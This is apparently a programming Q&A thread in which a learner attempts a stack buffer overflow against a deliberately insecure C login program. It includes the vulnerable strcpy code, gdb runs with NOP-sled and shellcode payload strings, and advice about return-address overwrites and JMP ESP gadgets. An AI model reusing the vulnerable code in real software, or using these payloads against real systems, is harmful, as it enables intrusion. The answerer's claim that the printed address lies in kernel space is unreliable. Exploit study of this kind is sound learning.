# Shellcode to buffer overflow not working linux m32

Tags: buffer-overflow, vulnerability, c

What my purposely insecure program does is to check if a username matches a specific string by copying user input into a buffer and comparing it.

I have compiled the program

```
cc -o real real.c -g -m32 -static -fno-stack-protector
```

I have managed to fill the buffer with shellcode and overwrite my EIP with the return address of where the buffer overflow happens in order for it to be executed using GDB. But a segmentation problem keeps happening that I don't understand.

I even try include a `printf %s` to print the address of my buffer to make sure I got the correct address

```
#include <stdlib.h>
#include <string.h>

int checkUserName(int argc, char **argv) {
    char storedName[300];
    int pass = 1;
printf("%p\n", (void*)&storedName);

if(argc == 1){
      pass = 0;
printf("Nothing Entered");
return(0);
    }

else if(sizeof(argv[1]) > 20){
            printf("Too many characters.");
    pass = 0;
            return(0);
    } 
else if(argc > 1) {
      strcpy(storedName, argv[1]);
    }

    while (pass == 1) {
      if(!strcmp(storedName, "694449"))
      {
        printf("Username Successfull\n");
        return(1);
      }
      else{
        return(0);
   }
    }
}

int checkUserPassword(char *userPassword) {

    if(!strcmp(userPassword, "1994"))
{
      return(1);
    }

    else{
      printf("\nWrong Password. Exiting Program");
      return(0);
    }
}

int openBankAccounts() {
    char buff[5000];
    FILE *fp;

    fp = fopen("/home/parallels/RASS/bankAccounts.txt", "r");
    while (fgets (buff, sizeof(buff), fp)) {
      printf("%s", buff);
 }
 fclose(fp);
}


int main(int argc, char *argv[]) {

    int go = 1;
    if(!checkUserName(argc, argv)){
            printf("\nWrong Username. Exiting Program");
            go = 0;
            return(0);
    }

    while (go == 1){

      char userPassword[5];
      printf("\nPlease Enter 4 Digit Pin: ");
      fgets(userPassword, 5, stdin);

      if (!checkUserPassword(userPassword)){
        return(0);
      }
      else{
        go = 0;
      }
    }

  if(go == 0){
        openBankAccounts();
  }
    return 0;
}
```

---

GBD CODE

```
  (gdb) run $(python -c 'print "\x90"*20 + "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2"+ "\x90"*284')


  Starting program: /home/parallels/RASS/real $(python -c 'print "\x90"*20 + "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2"+ "\x90"*284')
 0xffffce50
```

The address `0xffffce50` above comes from the printf. I'm aware that this address changes when executed outside of GDB. I'm also aware that any more inputted characters will start to overwrite the EIP.

```
 Program received signal SIGSEGV, Segmentation fault.
 0x08048f1a in openBankAccounts () at real.c:54


(gdb)  info reg ebp eip
 ebp            0x90909090  0x90909090
 eip            0x8048f1a   0x8048f1a <openBankAccounts+29>
```

Now I run it from terminal first, to get the program to print the address:

```
 parallels@ubuntu:~/RASS$ ./real haha
 0xffffcfb0
```

And then I run it with that address:

```
 parallels@ubuntu:~/RASS$ ./real $(python -c 'print "\x90"*20 + "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2"+ "\x90"*284' + "\x70\xce\xff\xff")
0xffffce70
Segmentation fault (core dumped)
```

As you can see, the memory address that I have inserted at the end of my python input is the same as the printed address that the program prints out. What should happen is that the EIP should contain this address and execute the instruction at that address which points back to the buffer that I have overflown with shellcode. But a segmentation fault happens that I do not understand. Everything makes sense

Comment: Have you tried to simplify the program to perform the attack? A buffer overflow attack only needs a few lines of code. Start with a small program and grow it.

Comment: no i havent. maybee thats a good idea. I was just curious to know what went wrong as i have done everything perfect (as i know)

Answer (score -1):

This may not directly relate to your segfault problem, but I notice something looks a little unusual about your printed address, it is 0xffffcfb0, which can't be correct, since that is above the Linux 32 bit user space range, at 0xc0000000.

I don't think you should print your address this way:

```
printf("[%p]\n", (void*)&storedName);
```

Since storedName is already an array, you can use it like a pointer:

```
printf("[%p]\n", (void*)storedName);
```

Furthermore, I am still not so sure if you did actually get your EIP overwritten properly.
I tried to run your code in GDB with a modified string content as below:

```
(gdb) run $(python -c 'print "\xAA"*20 + "\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB"+ "\xCC"*284' + "\xDD\xDD\xDD\xDD")
Starting program: /home/user/real $(python -c 'print "\xAA"*20 + "\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB\xBB"+ "\xCC"*284' + "\xDD\xDD\xDD\xDD")
storedName: 0xbfffef80

Program received signal SIGSEGV, Segmentation fault.
0x0805c84a in memcpy ()
(gdb) info reg
eax            0xccccb939       -858998471
ecx            0x0      0
edx            0xbffff174       -1073745548
ebx            0x1      1
esp            0xbffff008       0xbffff008
ebp            0x0      0x0
esi            0xbffff318       -1073745128
edi            0xccccb938       -858998472
eip            0x805c84a        0x805c84a <memcpy+90>
eflags         0x10247  [ CF PF ZF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

(gdb) bt
#0  0x0805c84a in memcpy ()
#1  0x0804f4b1 in _IO_getline_info ()
#2  0x0804f5de in _IO_getline ()
#3  0x0804f245 in fgets ()
#4  0x08048d0c in openBankAccounts () at real.c:56
Backtrace stopped: Cannot access memory at address 0xccccccd0
```

During crash, the EIP seem did not land at 0xDDDDDDDD. So you didn't actually land your EIP correctly.

Another check at your input string and I notice you have the single quote put at the wrong place in your python script, 
"\xCC"*284' 
This ended your input too early.
After moving the single quote to the end of the input, it segfault at the correct place 0xDDDDDDDD, which is your inserted/intended EIP address.

But again, I'm still curious how did you come up with the EIP target address that start with 0xFFFF****? Shouldn't you be jumping back to your shell code address that is in user space?

Comment: Ahh ok I will see if that makes a difference:)

Comment: that address is were i have inputted my shellcode which is inside the storedName buffer. then i used the printf function to print out the address of the storedName which is what i want my eip to point to so it can execute the embedded shell code

Comment: A few things, firstly, like I point out earlier, I believe you have printed storedName the wrong way. Hence, it dereferenced it elsewhere. It shouldn't be 0xffff****, that is kernel address, and I don't think you can just JMP there, you need system call to enter kernel mode.  Try displaying the address of storedName in GDB using a breakpoint and you will see that the address should have an address lower than 0xc0000000, which is what you would get if you print it correctly.

Comment: Another thing is, I didn't disassemble your shellcode to understand how you want it to work.  But since you put your shellcode on the stack frame, the address would change on each execution.  What you need is a fixed address to jump to. If I remember correctly, the usual trick people use is to jump to any opcode some of the fixed library address that happens to have code is similar to JMP ESP or something like that.

Comment: what i dont understand is how come the eip has

Comment: eip            0x805c84a        0x805c84a <memcpy+90>

Comment: then when you back trace it, it is showing 0xccccccd0

Comment: Ok, take this opinion with a huge grain of salt, as I may be talking off my ass. :-)

Comment: Since you incorrectly terminate the string before 0xDDDDDDDD input was inserted, it just take on whatever value that happen to be there. You didn't actually carry out the attack correctly, resulted in a corrupted stack.  I wouldn't spend too much time on a corrupted stack. Anyway, even if your attack was successful, the stack trace will still be unreliable after buffer overflow since you have changed the return path in a way. I use the stacktrace just to have a feel on where is EIP during the segfault.

Comment: I'm just guessing since I haven't got time to actually debug it. In your code, openBankAccounts should come after checkUserName, which shouldn't be the case if you have successfully triggered the attack, in which case the execution should be around your shellcode instead.

Comment: haha no problem mate. appreciate your time

Comment: Your are most welcome. :-) Do let me know if you get it to work. But in general, I believe you need to find a fixed user space address (such as in the library that has opcode which JMP ESP or something like that) to jump to, and use that for the 0xDDDDDDDD, and it shouldn't be a kernel space address.